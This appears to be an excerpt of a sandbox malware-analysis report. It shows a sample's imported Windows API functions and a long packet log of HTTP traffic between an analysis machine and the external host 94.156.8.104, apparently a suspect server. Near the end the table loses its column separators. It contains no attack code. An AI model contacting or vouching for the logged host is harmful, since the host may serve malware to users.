                                    GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                    SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                    ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                    COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                    ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Apr 26, 2024 13:39:20.856138945 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.111232996 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.111480951 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.111854076 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.363962889 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364439964 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364517927 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364628077 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.364676952 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364845991 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364903927 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.364911079 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.364911079 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.364959955 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.365021944 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.365078926 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.365081072 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.365134001 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.365248919 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.365293026 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.365418911 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.365418911 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.365418911 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.365535975 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.615818977 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.615900040 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.615958929 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616014957 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616070032 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616127014 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616157055 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616158009 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616215944 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616280079 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616337061 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616379023 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616379023 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616379023 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616390944 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616447926 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616503954 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616547108 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616559029 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616616011 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616671085 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616719961 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616725922 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616719961 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616719961 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616719961 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616719961 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616781950 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616837025 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616894007 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.616899014 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616899967 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616899967 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.616949081 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.617019892 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.617019892 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.617178917 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.617180109 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.869699955 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.869776964 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.869837999 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.869894028 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.869949102 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.869967937 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870003939 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870060921 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870120049 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870166063 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870167017 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870177031 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870234013 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870287895 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870335102 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870336056 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870342970 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870398998 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870452881 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870501041 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870501041 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870508909 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870564938 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870620012 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870677948 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870676994 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870676994 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870676994 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870733976 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870790005 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870845079 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870845079 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870846033 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870846033 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.870899916 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.870955944 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871011019 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871068001 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871123075 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871177912 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871233940 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871289968 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871345043 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871400118 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871423006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423960 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423960 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871423960 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871455908 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871511936 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871511936 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871511936 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871512890 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871512890 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871557951 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871567965 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871623039 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871678114 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.871797085 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871985912 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.871985912 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.872092009 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.872152090 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.872284889 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.872292995 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.872354031 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:21.872464895 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:21.872617006 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.122659922 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.122745037 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.122807980 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.122868061 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.122886896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.122931004 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.122992992 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123058081 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123064041 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123059034 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123126984 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123188972 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123229027 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123229980 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123229980 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123255014 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123318911 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123378038 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123394966 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123435020 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123492002 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123545885 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123569965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123569965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123569965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123569965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123569965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123601913 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123660088 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123714924 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123744965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123744965 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123769999 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123828888 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123884916 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123908997 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.123939991 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.123996019 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124049902 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124080896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124080896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124080896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124080896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124080896 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124108076 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124166012 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124258995 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124263048 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124263048 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124316931 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124373913 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124428034 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124428988 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124484062 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124538898 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124593973 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124589920 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124591112 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124591112 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124591112 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124591112 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124650002 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124705076 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124759912 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124763966 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124763966 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124814987 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124870062 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124898911 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.124923944 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.124979973 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125034094 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125072002 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125072002 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125072002 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125089884 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125145912 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125200033 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125238895 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125255108 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125312090 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125366926 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125416994 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125421047 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125416994 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125417948 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125417948 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125417948 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125479937 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125535965 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125580072 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125581026 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125591040 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125647068 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125700951 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125749111 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125756025 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125812054 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125864983 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125920057 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.125922918 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125922918 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125924110 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125924110 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125924110 CEST | 50341 | 80 | 192.168.11.20 | 94.156.8.104
                                    Apr 26, 2024 13:39:22.125974894 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.126029968 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.126085043 CEST | 80 | 50341 | 94.156.8.104 | 192.168.11.20
                                    Apr 26, 2024 13:39:22.126096964 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126097918 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126097918 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126138926 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126194000 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126249075 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126260042 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126260042 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126260042 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126303911 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126358986 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126414061 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126430035 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126467943 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126523018 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126576900 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126578093 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126578093 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126578093 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126579046 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126579046 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126631975 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126687050 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126743078 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126748085 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126748085 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126748085 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126748085 CEST5034180192.168.11.2094.156.8.104
